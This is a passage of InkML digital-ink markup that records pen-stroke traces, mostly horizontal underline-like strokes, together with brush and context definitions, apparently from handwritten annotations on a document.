  <inkml:trace contextRef="#ctx0" brushRef="#br0">3084 13607,'19'36,"-1"1,0-1,18-18,-18 0,19 19,-1-19,-18 18,18 0,1 1,-19-19,18 18,-18 0,0-36,-18 18,0 1,0-1,0 0,0 0,0 0,-18 0,18 0,-18 1,0-19,0 18,0-18,-1 0,-17 18,18-18,0 18,0-18,-19 0,-17 0,18 0,18 0,-37 18,19-18,0 18,-1-18,1 0,18 0,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0:59.6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678 5679,'36'0,"0"0,37 0,54 0,36 0,37 18,72 18,91-18,-55 0,-54 19,-18-37,-18 0,18 0,-1 0,-53 0,-1 0,-36 0,-18 0,0 0,-36 0,-18 0,-37 0,0 0,-18 0,1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2:50.4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046 5860,'18'0,"0"0,37 0,17 0,-17 0,35 0,37 18,0 0,0 1,-18-19,0 0,-18 0,18 0,18 18,-18-18,18 0,0 18,18-18,-55 0,56 0,35 18,-18-18,-18 0,37 0,-19 0,19 0,17 18,19-18,0 18,-19-18,-54 0,19 0,-19 0,-36 0,-1 0,19 0,0 0,-36 0,54 18,-36-18,18 0,18 0,-36 0,0 0,36 0,-54 0,-19 0,-17 0,36 0,-37 0,19 0,-1 0,19 0,-19 0,1 0,0 0,-19 0,0 0,1 0,-19 0,0 0,-17 0,35 0,-36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2:51.59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791 6205,'18'0,"18"0,1 0,-1 0,0 0,0 0,1 0,17 0,-18 0,19 0,-1 0,1 0,-1 0,19 0,17 0,19 0,-18 0,36 0,-36 0,18 0,-19 0,19 0,-18 0,18 0,-19 0,-17 0,-19 0,19 18,0-18,-37 0,-18 0,0 0,18 0,-17 0,-1 0,0 0,0 0,0 0,0 0,0 0,1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4:58.1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56 7330,'18'0,"0"-18,0 18,0 0,19 0,17-19,0 19,1 0,36 0,54 0,0 0,36 0,-17 0,53 0,-17 0,-1 0,1 0,18 19,-19-19,-17 0,35 0,-17 0,-37 0,19 0,-1 18,1-18,-37 0,-18 0,18-18,-18 36,-36-18,17 0,-35 18,18-18,18 18,-55 0,0-18,1 0,-1 18,-17-18,17 0,-36 0,18 0,-17 0,17 0,-18 0,0 0,0 0,19 0,-19 0,18 0,0 0,-18 0,19-18,-1 18,0 0,19 0,-19 0,18 0,1 0,17 0,1 0,-19 0,1 0,17 0,-35 0,-19 0,0 0,0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4:59.9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410 7203,'18'0,"0"0,0 0,0 0,19 0,-19 0,18 0,19 0,17 0,1 0,36 0,54 0,0 0,19 0,35 0,37 0,18 0,55 0,-37 0,73 18,-18-18,54 0,-181 0,36 18,-73-18,19 0,-91 0,-1 0,-71 0,-19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30.1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400 5098,'18'0,"1"0,-1 0,0 0,18 0,19 0,17 0,37 0,18 0,-18 0,36 0,36 0,-17 0,35 0,-17 0,17 0,-35 0,-1 0,18 0,-36 0,-54 0,-36 0,-1 0,-18 0,-18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32.5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924 5697,'0'-18,"37"18,-19 0,18 0,0-18,1 18,-1 0,36 0,-17 0,17 0,37 0,-18 0,36 0,-18 0,36 0,0 0,0 0,-18 0,-18 0,36 0,-18 0,-18 0,18 18,18-18,-18 18,-36-18,18 0,0 18,-55-18,1 0,-1 0,0 0,-35 0,-1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33.7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71 5806,'19'0,"17"0,0 0,0 0,1 0,17 0,19 0,-19 0,1 0,35 0,1 0,36 0,-36 0,-19 0,1 0,36 0,-37 0,19 0,0 18,-37-18,19 0,-37 18,0-18,1 18,-1-18,0 0,-18 0,0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39.0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92 6441,'18'0,"0"-18,18 18,-17 0,35 0,0 0,1-19,-1 19,19 0,36 0,-37 0,-17 0,35 0,-35 0,-1 0,37 0,-18 0,-19 0,19 0,-19 0,0 0,19 0,-37 0,1 0,17 0,-18 0,19 0,-19 0,0 0,1 0,17 0,0 0,-17 0,35 0,-17 0,-19 0,0 0,19 0,-19 0,-18 0,0 0,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43.6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76 8563,'18'0,"0"0,0 0,1 0,17 0,-18 0,18 0,37 0,-19 0,19 19,18-19,-19 0,1 0,17 0,-17 0,18 0,-19 0,1 0,-1 0,55 0,0 0,-18 0,18 0,0 0,-18 0,18 0,18 0,0 0,-18 0,19 0,-1 0,-18 0,36 0,-18 0,55 0,-19 0,1 0,-19 0,0 0,19 0,-37 0,-36 0,36 0,-18 0,0 0,0 0,18 0,-54 0,17 0,-17 0,36 0,-36 0,36 0,0 0,-18 0,36 0,-18 18,-18-18,0 0,18 0,-19 0,-17 0,36 0,-36 0,18 0,-19 0,1 0,18 18,-36-18,35 0,-17 0,0 0,36 0,0 0,18 0,-18 0,-18 0,36 0,0 0,-18 0,0 0,0 0,-36 0,36 0,-36 0,36 0,-37 0,1 0,0 0,-1 0,19 0,-54 0,17 0,-35 0,17 0,0 0,-17 0,35 0,-54 0,55 0,18 0,-1 0,-17 0,36 0,-18 0,-19 0,37 0,-18 0,-19 0,37 0,-18 0,18 0,-19 0,-17 0,0 18,54-18,-19 0,38 0,-38 0,19 0,0 0,19 0,17 0,-18 0,-18 0,0 0,-36 0,36 0,-55 0,19 0,18 0,-18 0,17 0,-35 0,-19 0,19 0,0 0,-1 0,-17 0,-1 0,0 0,1 0,-37 0,18 0,19 0,-19 0,18 0,1 0,-1 18,19-18,-19 0,1 18,17-18,-17 0,-1 0,1 0,-1 18,-18-18,19 0,-1 0,-18 0,1 0,17 0,-18 0,-17 0,-1 0,0 0,0 0,0 0,0 0,0 0,1 0,17 0,-18 0,0 0,0 0,0 0,1 0,-1 0,0 0,18 0,0 0,19 0,-1 0,-17 19,-1-19,-18 0,36 0,-17 18,-1-18,0 0,-18 18,37-18,17 0,-35 18,-19-18,0 0,18 0,1 0,-19 0,18 0,-18 0,37 0,-19 0,0 0,-18 0,37 0,-1 0,-18 0,55 0,0 0,18 0,-37 0,-17 0,-37 0,18 0,-54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07.7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90 11992,'-18'0,"0"0,-37-18,19 18,18-18,-36 0,-1 18,37 0,-18 0,-19 0,19 0,-18-18,17 18,1 0,18 0,0 0,18-18,-18 18,-1 0,1 0,0 0,0 0,0 0,0 0,0 0,-1 0,1 0,0 0,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1:07.3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22 10087,'0'0,"54"0,0 0,1 0,-19-18,0 18,37 0,-19 0,1 0,17 0,1 0,-19 0,19 0,0 0,-37 0,-18 0,0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09.4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180 11974,'19'0,"17"0,-18 0,0 0,18 18,19-18,-37 0,55 19,-19-19,0 0,37 0,0 18,-19-18,19 0,-18 0,-19 0,1 18,17 0,-36-18,1 0,-1 0,-18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10.9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577 11902,'37'0,"-1"0,-18-18,18 18,-17 0,35 0,-18 0,1 0,17 0,0 0,1 0,-1 0,1 0,-1 0,1 0,-1 0,0 0,1 0,-1 0,-17 0,-19 0,18 0,-18 0,0 0,0 0,19 0,-19 0,0 0,0 0,0 18,19-18,-19 0,18 0,0 0,-18 0,1 18,17-18,-18 0,18 0,-18 0,1 0,-19 18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22.3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49 14932,'18'0,"0"0,0 0,19 0,17 0,19 0,54 0,0 0,0 0,18 0,18 0,37 0,-37 0,0 0,-18 0,1 0,-19 0,-37 0,19 0,-18 0,-19 0,-17 0,-19 0,-18 0,0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23.2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49 15476,'18'0,"18"0,0 0,37 0,36-18,-19 18,37 0,19 0,-19 0,18 0,0 0,-18 0,-18 0,0 0,-19 0,-17 0,-1 0,-17 0,-1 0,-17 0,-1 0,0 0,-18 0,0 0,1 0,-1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25.0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092 14732,'0'-18,"0"36,0 0,18 18,-18 1,0-19,18 18,-18 19,0-1,55 0,-37 19,-18-37,0 19,0-37,0 18,0-18,0 19,0-1,0 0,0 19,0-37,-18 18,18 0,0-18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31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46 15022,'37'0,"-1"0,18 0,19 0,0 0,-1 0,55 0,-36-18,-19 18,19 0,-18 0,-19 0,-18 0,1 0,-1 0,-18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32.2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65 15657,'0'-18,"54"18,0 0,55 0,18 0,18 0,1 0,35 0,-54 0,-36 0,36 0,-18 0,-19 0,-35 0,17 0,-17 0,-37 0,0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5:52.918"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05292" units="cm"/>
      <inkml:brushProperty name="height" value="0.05292" units="cm"/>
      <inkml:brushProperty name="color" value="#1F497D"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">2595 8291,'0'0,"0"37,0-19,0 0,0 36,0-17,18-1,-18 0,0-18,0 19,36 17,-36-18,18 19,-18-37,0 0,0 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1623.9562">2595 8346,'18'0,"0"0,0 18,18-18,19 0,-1 0,19 18,17-18,1 18,18-18,-18 0,-1 0,19 0,-36 0,-1 0,-17 0,17 0,-17 0,-19 0,0 0,19 0,-1 0,1 0,17 0,-17 0,-19 0,0 0,1 18,-19-18,0 0,0 0,18 0,-18 0,1 0,-1-18,0 18,0 0,0 0,0 0,0 0,1 0,-1 0,0 0,0 0,0 0,0 0,0 0,1 0,-1 0,-18 18,18 19,-18-19,0 0,0 0,0 0,18 0,-18 0,0 1,0-1,0 0,0 18,0 0,0 1,0-19,0 18,0-18,0 0,0 1,0-1,0 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="2439.2105">3066 8926,'37'0,"-19"0,18 0,37 0,-1 0,55 0,18 0,0 0,55 37,-55-37,18 18,-36-18,-36 0,0 0,-55 0,-18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36:43.5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23 5715,'18'0,"36"0,1 0,17 0,37 0,18 0,18 18,-36-18,54 0,-54 0,36 0,-18 0,-18 18,36-18,-54 18,-37-18,-17 0,-1 0,0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35.7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17 8926,'18'0,"-18"-18,36 18,1 0,-19 0,0 0,18 0,-18 0,0 0,1 0,17 0,-18 0,0 0,-36 0,-18 0,18 0,-37 0,19 0,18 0,-37 0,19 0,18 0,0 0,0 0,36 0,0 0,0 0,18 0,-18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1:10.6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498 10015,'19'0,"-1"0,36 0,19 0,-1 0,37 0,0-18,36 18,0 0,37 0,-73 0,18 0,-19 0,-17 0,-18 0,-1 0,37 0,-18 0,18 18,18-18,-37 18,19 0,-36-18,18 0,-19 18,-36-18,19 0,17 18,-17 1,17-1,19 0,-18-18,-19 0,19 0,-19 0,1 0,-1 18,-18-18,1 0,-1 0,-18 0,0 0,18 0,-17 0,-1 0,0 0,0 0,0 0,18 0,-36-18,37 18,-1 0,18 0,-17 0,17 0,1 0,35 18,1-18,36 0,-18 0,0 0,-19 0,-53 0,17 0,-36 0,19 0,17 0,19 0,-19 0,-18 0,1 0,-1 0,-54 18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38.67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091 8836,'0'18,"18"-18,0 0,0 0,37 0,-19 0,18 0,19 0,-1 0,19 0,18 18,18-18,-36 0,-1 0,19 0,-36 0,-1 0,-17 0,-37 0,36 0,-35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26.1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78 4318,'18'0,"18"0,1 0,17 0,19 0,-1 0,37 0,18 0,-18 0,36 0,0 0,0 0,37 0,-19 18,37-18,-55 18,54 0,-17-18,-1 0,-36 0,19 19,-19-19,-18 0,0 0,-36 0,-19 0,1 0,-1 0,37 0,-36 0,-1 0,-17 0,-1 0,-18 18,-17-18,17 0,-18 0,0 0,0 0,0 0,1 0,-1 0,0 0,18 0,0 0,1 0,17 0,-36 0,19 0,17 0,-18 0,1 0,-19 0,18 0,-18 0,0 0,0 0,19 0,-19 0,18 0,0 18,19-18,-37 0,36 0,-54 18,37-18,-19 0,0 0,0 0,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38.5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49 5969,'0'0,"18"0,1 0,-1 0,18 0,0 0,37-18,-19 18,1 0,35 0,-17 0,36 0,36 0,18 0,1 0,-1 0,0 0,-36 0,18 0,-36 0,-36 0,17 0,-17 0,-37 0,19 0,-1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39.7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761 5951,'36'0,"-18"0,19 0,-1 0,0 0,1 0,35 0,1 0,36 0,-19 0,55 0,1 0,-19 0,36 0,36 0,-35 18,35-18,19 18,-18-18,-19 0,0 0,1 0,54 0,-19 0,1 0,-18 0,90 0,-54 0,18 0,-55 0,1 0,18 0,-73 0,18 0,0 0,-17 0,-1 0,-55 18,37-18,-54 0,-19 0,19 0,-37 0,1 0,17 0,-36 0,0 0,0 0,1 0,-1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55.0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56 8636,'18'-18,"18"18,0-18,19 18,-19 0,19 0,-1 0,19 0,35 0,1 0,36 0,1 0,35 0,0 0,1 0,-1 0,-17 0,35 0,-54 0,0 0,-36 0,18 0,-54 0,-19 0,-17 0,-1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55.8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874 8582,'0'0,"18"0,-18-19,37 19,-1 0,0 0,19-18,17 18,19 0,18 0,18 0,18 0,0 0,18 0,-18 0,37 0,-19 0,-18 0,-18 0,18 0,-18 0,19 0,-38 0,1 0,-54 0,-1 0,-18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57.2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557 8763,'0'-18,"18"18,37 0,17 0,1 0,54 0,18 0,-18 0,18 0,18 0,1 0,17 0,-36 0,-36 0,36 0,0 0,-18 0,0 0,-36 0,36 0,-54 0,36 0,-55 0,-18 0,1 0,-19 0,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0:59.3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84 9579,'19'0,"-1"0,0 0,0-18,0 18,18 0,1 0,17 0,1 0,53 0,38 0,17 0,0 0,91 0,-36 0,18 0,-55 0,-36 0,-54 0,-55 0,-72 0,18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02.1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06 9670,'19'0,"-1"0,36 0,1-18,17 18,1-18,72 18,54-18,-35 18,53 0,56 18,-1 0,-73-18,73 0,-54 0,-18 18,-37-18,-18 18,0 0,-72-18,-19 0,-17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03.3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213 9779,'19'0,"-1"0,0 0,0-18,36 18,-17 0,53 0,19 0,-18 0,18-18,0 18,18 0,-18 0,18 0,18 0,-18 0,0 0,-18 0,-1 0,-35 0,18 0,-1 0,1 0,-18 0,-55 0,54 0,-35 0,-1 18,-18 0,0-18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41:16.1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625 11321,'19'0,"17"0,18 0,19 0,36 0,72 0,1 0,35 0,55 0,-18 0,19 0,89 0,38 0,-1 0,72 36,-35-36,126 55,-72-55,54 0,55 0,-91 36,-145-18,-109 0,18-18,-54 0,-37 19,19-1,-55 0,36 0,-35 0,-19 18,-19 1,-53-37,-19 0,-36-18,0-1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05.1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869 9688,'18'0,"0"0,0 0,18 0,37 0,54 0,18 0,0 0,0 0,1 0,35 0,-72 0,0 0,-19 0,-53 0,17 0,-36 0,0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25.3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27 11158,'36'0,"0"-18,37 18,36 0,-19-18,55 18,-18 0,0 0,0-19,19 19,-1 0,18 0,0 0,37 0,-1 0,-17 0,17 0,-17 0,-1 0,-36 0,-18 0,-18 0,-36 0,-19 0,1 0,-37 0,0 0,0 0,0 19,0-19,19 0,-1 0,18 0,1 0,-1 0,1 0,-1 0,-18 0,1 0,-1 0,0 0,-18 0,1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28.0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41 11194,'36'0,"-36"-18,18 18,19 0,-1 0,0 0,1 0,53 0,19 0,-18 0,54 0,-18 0,18 0,0 0,0 0,-18 0,37 0,-37 0,-18 0,-1 0,-17 0,18 0,-36 0,17 0,37 0,-36 0,36 0,-18 0,18 18,-36-18,-1 0,74 18,-74-18,1 0,36 0,-18 0,36 0,-36 0,36 0,-36 0,36 0,0 0,0 0,0 0,-18 0,-18 0,36 18,-18-18,0 0,0 0,-18 0,36 0,-36 0,18 0,-18 0,18 0,0 0,-18 0,36 0,-18 0,-54 0,36 0,36 19,18-1,-18-18,-18 0,18 0,-18 0,18 0,-18 0,-36 0,-36 0,-1 0,-36 0,18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2:05.6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24 13698,'19'0,"-1"0,0 0,0 0,36 0,1 0,36 0,-19 0,55 0,-18 0,72 0,-35 0,17 0,36 0,-35 0,53 0,19 0,-18 0,18 0,36 0,-18 0,-36 0,36 0,-18 0,18 0,-55 0,55 0,0 0,-36 0,-37 0,19 0,-19 0,1 0,-19 0,-18 0,-36 0,-18 0,-1 0,-35 0,-1 0,1 0,-19 0,-36-18,18 18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01.3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257 15131,'0'0,"18"0,1 0,-1 0,0 0,0 0,0 0,18 0,1 0,-1 0,0 0,37 0,-19 0,37 0,0 0,-19 0,1 0,-1 0,-17 0,-19 0,0 0,-17 0,-1 0,0 0,0 0,0 0,18 0,1 0,-1 0,18-18,1 18,-19 0,19-18,17 18,1 0,54 0,-37 0,37 0,-36 0,54 0,-18 0,0 0,18 0,-36 0,18 0,-36 0,18 0,-37 0,1 0,-19 0,19 0,0 0,-19 0,19 0,-19 0,0 0,19 0,-19 0,19 0,0 0,17 0,-17 0,-1 0,1 0,-19 0,1 0,-37 0,0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04.0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92 15040,'18'0,"0"0,0 0,0 0,37 0,17 0,19 0,36 0,0 0,0 0,-36 0,36 0,-55 0,-17 0,-19 0,0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05.6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23 15004,'18'0,"0"0,0 0,0 0,19 0,-1 0,18 0,37 0,18 0,18 0,18 0,-36 0,36 0,-18 0,18 0,-18 0,0 0,-36 0,36 0,-36 0,18 0,-19 0,-17 0,-1 0,1 0,-19 0,-17 0,-1 0,0 0,-18 0,19 0,-19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07.2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447 14968,'18'0,"0"0,37 0,-1-18,19 18,18 0,36 0,-55-18,37 18,-18 0,36 0,-37 0,37 0,-36 0,36 0,18 0,19 0,-1-19,0 19,-18 0,0 0,1 19,-1-19,-36 0,-1 0,-17 0,0 0,-37 0,-17 0,-1 0,-18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09.5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86 16111,'-19'0,"74"0,-1 0,19 0,18 0,-1 0,1 0,36 0,-18 0,-18 0,-1 0,19 0,-18 0,-19 0,1 0,-19 0,1 0,-1 0,1 0,-37 0,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11.1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42 16165,'18'0,"0"0,19 0,-1 0,18 0,1 0,-1 0,19 0,36 0,-19 0,37 0,-36 0,-18 0,35 0,-71 0,-19 0,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11.8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27 4639 0,'18'0'281,"194"-18"-265,-36 18-1,18 0-15,53 0 16,-18 0-16,-17 0 15,35 0-15,-35 0 16,-18 0-16,0 0 16,-36 0-16,-34 0 15,-36 0-15,-17 0 16,-1 0-16,1-35 16,-18 35-16,-36-18 15,54 18-15,-1 0 16,1 0-16,52 0 15,-34 0-15,16 0 16,-16 0 0,52 0-16,-35 0 15,35 0-15,35 0 16,-70 0-16,0 0 16,35 0-16,-35 0 15,17 0-15,-17 0 16,0 0-16,0 0 15,0 0-15,-18 0 16,-35 0-16,17 0 16,-35 0-16,36 0 15,52 0-15,-17 0 16,-35 0-16,35 0 16,17 0-16,1 0 15,17 0-15,0 0 16,18 0-16,17 0 15,0 0-15,18 0 16,-17 0-16,-1 0 16,-35 0-16,18 0 15,-53 0-15,-36 0 16,1 0-16,-18 0 16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12.4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351 16056,'0'-18,"36"18,1 0,17 0,-18 0,19 0,36 0,-37 0,0 0,-17 0,35 0,-17 0,17 0,-17 0,17 0,1 0,-19 0,19 0,-19 0,19 0,-19 0,19 0,-1 0,1 0,36 0,-18 0,17 0,-17 0,54 0,-18 0,37 0,-19 0,54 0,-54 0,19 0,35 0,-54 0,19 0,-19 0,0 0,-18 0,18 0,-18 0,-18 0,36 0,-36 0,-18 0,36 0,-37 0,-17 0,-19 0,19 0,-19 0,-17 0,-1 0,-18 0,0 0,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14.9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717 15748,'18'0,"37"0,17 18,1-18,54 0,0 0,18 0,-18 0,18 0,0 0,-54 0,36 0,-36 0,36 0,-73 0,19 0,-19 0,-18 0,-17 0,17 0,-18 0,0 18,0-18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16.7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44 17072,'0'-18,"37"18,-19 0,18 0,0 0,37 0,-1 0,-17 0,-1 0,19 0,-19 0,1 0,-19 0,18 0,-35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18.3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81 17163,'0'0,"18"0,0 0,18 0,1 0,35 0,1 0,-1 0,37 0,-18 0,18 0,-18 0,-1 0,19 0,-18 0,-19 0,19 0,-18 0,-1 0,1 0,-19 0,-17 0,-1 0,-18 0,0 0,0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28.82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59 8273,'18'0,"0"0,0 0,-18 18,36 0,-18-18,1 0,17 19,-18-19,-36 0,0 0,-19 0,-17 0,0 0,-19 18,-18-18,37 0,-1 0,19 0,0 0,72 0,37 0,-1 0,19 0,0 0,36 0,-37 0,19 0,-18 0,-18 0,-1 0,-36 0,-17 0,-56 0,19 0,0 0,-18 0,-19 0,19 0,-18 0,-1 0,1 0,-1 0,19 18,18-18,0 0,54 0,18 0,-17 0,-1 0,18 0,-17 0,-1 0,0 0,-18 0,1 0,-38 0,1 0,0 0,0 0,0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30.30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898 7203,'18'-18,"0"18,0 0,0-19,18 19,19 0,-1 0,19 0,18 0,-1 0,37 0,-18 0,0 0,0 0,-18 0,36 0,-55 0,1 0,36 0,-55 0,0 0,1 19,-1-19,-17 0,-19 0,0 0,0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5:58.8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473 6096,'0'-18,"18"18,0 0,18 0,-17 0,-1 0,0 0,0 0,0 0,18-18,-17 18,-1 0,0 0,0 0,18 0,-18 0,37 0,-37 0,36 0,-17 0,-1 0,0 0,37 0,-19 0,1 0,-1 0,1 0,17 0,-17 0,-1 0,19 18,-37 0,-18-18,0 0,18 0,1 0,-19 0,0 0,0 0,0 0,0 0,1 0,17 0,0 0,-18 0,0 0,1 0,-1 0,0 0,0 0,0 0,18 0,-17 0,17 0,0 0,0 18,-17-18,-1 0,36 0,-36 0,19 0,-19 0,18 0,-18 0,18 0,-17 0,-1 0,0 0,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6:17.9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707 15458,'36'0,"36"0,-17 0,36 0,54 0,-36 0,36 0,0 0,0 0,18 0,-54 0,0 0,-18 0,-19 0,37 0,-36 0,-1 0,1 0,36 0,-19 0,19 0,-18 0,-37 0,37 0,36 0,-18 0,18 0,-18 0,0 0,18 0,-18 0,-1 0,19 0,19 0,-1 0,-36 0,-1 0,74 0,-37 0,-18 0,-36 0,18 18,-37-18,19 0,-19 0,1 0,-73-18,36 18,19 0,-1 0,1 0,-1 0,19 0,-19 0,19 0,17 0,37 0,-18 0,0 0,36 0,-54 0,18 0,-19 0,19 0,-18 0,-37 0,19 0,18 0,-1 0,-35 0,36 0,-1 0,19 0,-18 0,0 0,17 0,-35 0,18 0,-37 0,19 0,-1 0,-17 0,-1 0,19 0,17 18,-35-18,54 0,-37 0,37 0,-18 18,18 0,0-18,-37 18,1 0,36-18,-73 0,18 0,-36 0,1 0,17 0,-18 0,0 0,0 0,0 0,1 0,-1 0,0 0,0 0,0 0,0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6:37.781"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05292" units="cm"/>
      <inkml:brushProperty name="height" value="0.05292" units="cm"/>
      <inkml:brushProperty name="color" value="#1F497D"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">11104 5261,'-19'0,"1"0,0 0,0 0,-18 19,-1-19,-17 18,18 0,-19-18,1 36,-1-18,-17 0,36 1,17-1,1 0,0-18,18 18,-18-18</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="615.8009">10450 5062,'19'18,"-1"-18,0 36,18 1,-36 17,36 0,-17 1,-1-37,18 36,-36 1,36-19,-18-18,-18 0,0 1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0:41:55.3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27 15113,'0'-18,"0"0,18 18,-18-18,18 18,0 0,18 0,-18 0,19-19,-19 19,36 0,-17 0,-1 0,0 0,-18 0,0 0,1 0,-38 0,-17 0,18 0,-18 0,18 0,-19 0,19-18,0 18,36 0,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15.07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832 8784 0,'35'-70'172,"141"52"-156,-17-17-16,53 17 15,35 0-15,17-52 16,-52 52-1,-53 18-15,52 0 16,-34 0-16,-89 0 16,53 0-16,-70 0 15,-1 0-15,-35 0 16,1 0-16,-19 0 16,19-17-1,-1 17 1,0 0-16,53-18 15,-17 0-15,52 1 16,-34 17-16,-19 0 16,54 0-16,-1 0 15,-35 0-15,-17 0 16,-18 0-16,-18 0 16,18 0-16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37.5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40 9162,'18'0,"18"0,1 0,-1 0,37 18,-37-18,36 0,19 0,-36 0,17 0,37 0,-18 0,18 0,-37 18,19-18,0 0,-1 0,19 19,-18-19,-19 0,37 0,-18 0,0 0,-1 0,1 0,-18 0,-55 0,36 0,19 0,-19 0,1 0,-19 0,-18 0,18 0,-17 0,-1 0,0 0,0 0,0 0,0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39.4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04 9598,'18'0,"0"0,0 0,0 0,0 0,1 0,-1 0,36 18,1-18,17 0,37 18,-18-18,36 0,0 0,18 0,0 0,-18 0,18 0,0 0,0 0,1 0,-1 0,0 0,-18 0,36 0,-36 0,-18 0,0 0,-18 0,17 0,-17 0,-18 0,-1 0,1 0,-37 0,19 0,-19 0,-18 18,0-18,18 0,-17 0,-1 0,0 0,0 0,0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49.2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22 13244,'55'0,"17"0,-17 0,-1 0,-18 0,-17 0,35 0,-36 0,0 0,-18 18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50.7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604 13680,'36'0,"1"0,-1 0,-18 0,37 0,-19 0,0 0,0 0,-17 0,-1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55.2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63 15113,'18'0,"0"-18,0 18,0 0,1 0,-1 0,0 0,0 0,0 0,-36 0,0 0,0 0,0 0,18-18,18 18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7:58.3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519 15004,'18'0,"18"0,37 0,36 0,-19 0,-17 0,36 0,-19 0,56 0,35 0,-90 0,54 0,-18 0,-36 0,36 0,0 18,-19-18,19 0,0 18,0-18,0 0,-36 0,36 0,-36 0,18 0,0 0,-19 0,-35 0,-19 0,0 0,19 0,-37 0,0 0,0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8:31.7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99 7239,'18'18,"0"0,36 0,-17-18,17 37,55-1,-73-36,55 0,36 0,18 18,0-18,-18 0,37 0,-19 0,-18 0,18 0,-54 0,17 0,-17 0,0 0,-37 0,19 0,-1-18,1 18,0 0,-19 0,19 0,-1 0,1 0,-1 0,-17 0,-1 0,1 0,-1 0,-18 0,19 0,-1 18,-18-18,1 0,-19 0,18 18,0-18,1 0,-1 0,-18 0,-18 18,18-18,0 0,1 0,-1 0,0 0,0 0,0 0,0 0,0 0,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8:33.5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694 7348,'18'0,"0"0,-18-18,36 18,-18 0,19 0,17 0,19 0,-19 0,19 0,-1 0,1 0,-1 0,19 0,0 0,36 0,-36 0,17 0,1 0,18 0,-18 0,-18 18,0 0,-1-18,-35 0,17 0,-17 0,-37 0,0 0,36 0,-17 0,-1 0,-18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8:34.9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59 7239,'36'0,"0"0,1 0,17 0,55 0,-18 0,-1 0,19 0,18 0,-36 0,36 0,18 0,-54 0,54 0,-18 0,0 0,-36 0,18 0,-1 0,1 0,-18 0,18 18,-18-18,36 0,-55 0,1 0,-1 0,19 0,-18 0,-1 0,1 0,-1 0,-17 0,-1 0,1 0,-19 0,0 0,0 0,-17 0,-1 0,0 0,0 0,0 0,0 0,0 0,1 0,-1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8:37.1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175 7275,'0'0,"54"0,-17 0,35 0,-35 0,17 0,19 0,-19 0,-18 0,37 18,-37-18,37 0,-19 0,1 0,17 0,1 0,54 0,-18 0,-1 0,38 0,-19 0,18 0,-55 0,1 0,18 0,-55 0,1 0,-37 0,0 19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16.05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817 8590 0,'88'0'110,"106"0"-95,35 0-15,53 0 16,71 0-16,-18 0 16,53 0-16,-105 0 15,52 0-15,-141 0 16,-106 0-16,-35 0 16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8:38.8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05 8527,'0'0,"19"0,-1 0,0-36,18 36,19 0,-1 0,37 0,36 0,18 0,0 0,55 0,35-18,1 18,91 0,-1-37,1 1,-73 36,18 0,-36 0,-36 0,-55 0,0 0,-73 0,1 0,0 0,-55 0,18 0,-18 0,18 0,-17 0,17 0,0 0,-18 0,37 0,-37 0,18 0,-18 0,0 0,1 0,-1 0,36 0,1 0,17 0,19 0,-37-18,19 18,-19 0,1 0,-1 0,-18 0,-17 0,35 0,0 0,-17 18,17-18,-36 0,0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10.2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38 9942,'18'0,"18"0,18 0,1 0,36 0,36 0,-37 0,19 0,-18 0,18 0,0 0,-1 0,-17 0,18 0,-18 0,-1 0,-35 0,-1 0,-17 0,17 0,-36 0,0 0,0 0,1 0,-1 0,0 0,36 0,-17 0,-1 0,0 0,19 0,-37 0,18 0,-18 0,0 0,0 0,19 0,-19 0,0 0,18 0,1 0,-19 0,0 0,0 0,0 0,18 0,-17 0,-1 0,0 0,0 0,0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10.8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804 9870,'36'0,"0"0,19 0,-1 0,19 0,-19 0,1 0,-1 0,-18 0,1 0,-19 0,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12.5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890 9906,'18'0,"0"0,1 0,-1 0,18 0,37 0,35 0,-17 0,36 0,-18 0,18 0,18 0,18 0,1 0,-1 0,-18 0,0 0,19 0,17 0,-36 0,37 0,-37 0,0 0,36 0,-36 0,37 0,-1 0,1 0,-37-18,54 18,-35 0,17 0,-36 0,37 0,-37 0,-18 0,18 0,0 0,-18 0,0 0,-36 0,36 0,-36 0,17 0,-35 0,0 0,-1 0,1 0,-1 0,1 0,18 0,17 0,19 0,-36 0,18 0,36 0,0 0,0 0,-18 0,19 0,-38 0,19 0,0 0,-36 0,18 0,0 0,18 0,-18 0,0 0,-37 0,55 18,-18-18,-36 0,17 0,37 0,0 0,-36 0,18 0,-55 0,37 0,-18 0,35 0,1 0,18 0,-18 0,18 0,0 0,-18 0,-18 0,-1 0,37 0,-36 0,36 0,-36 0,36 0,-55 0,1 0,0 0,17 0,-35 0,-1 0,-36 0,0 0,-36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13.4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878 9979,'-18'0,"36"0,0-19,19 19,-1 0,37 0,35 0,-35 0,0 0,-1 0,-36-18,19 0,-19 18,0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14.9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37 11140,'18'-18,"0"18,1 0,17 0,0 0,37 0,17 0,-17 0,18 0,36 0,-37 0,37 0,-36 0,18 0,18 0,-36-19,36 19,-37 0,-35 0,-1 0,-17-18,-19 18,0 0,0 0,0 0,18 0,-17 0,35-18,19 18,54 0,18 0,0 0,-18 0,18 0,-54 0,18 0,-55 0,-36 0,0 0,19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21.3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77 11103,'18'0,"18"0,-17 0,35 0,-36 0,0 0,37 0,-19 0,-18 0,0 0,19 0,-1-18,0 18,0 0,19 0,-19 0,0 0,-17 0,-1 0,18 0,-18 0,0 0,0 18,1-18,-1 0,18 0,-18 0,37 0,-19 0,18 0,-17 0,17 0,0 0,1 0,17 0,-35 0,-1 0,0 0,1 0,-19 0,18 0,0 0,1 0,-1 0,0 0,19 0,-1 0,0 0,19 0,54 0,0 0,-18 0,36 0,-18 0,18 0,0 0,0 0,19 0,17 0,-18 0,37-18,-37 18,37 0,18 0,-37 0,19 0,17 0,19 0,-36 0,-37 0,37 0,-37 0,36 0,-17 0,-37 0,0 0,-18 0,0 0,18 0,0 0,-54 0,36 0,36 0,-54 0,0 0,0 0,0 18,-37-18,1 0,-19 0,19 0,0 0,-19 0,0 0,-17 0,-1 0,18 0,-17 0,-1 0,18 0,1 0,-19 0,37 0,-19 0,1 0,-1 0,37 19,-37-19,19 0,-19 0,19 0,54 0,-73 0,37 0,-37 0,-17 18,17-18,-36 0,0 0,0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26.5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92 12283,'0'0,"54"0,0 0,-17 0,17 0,-36 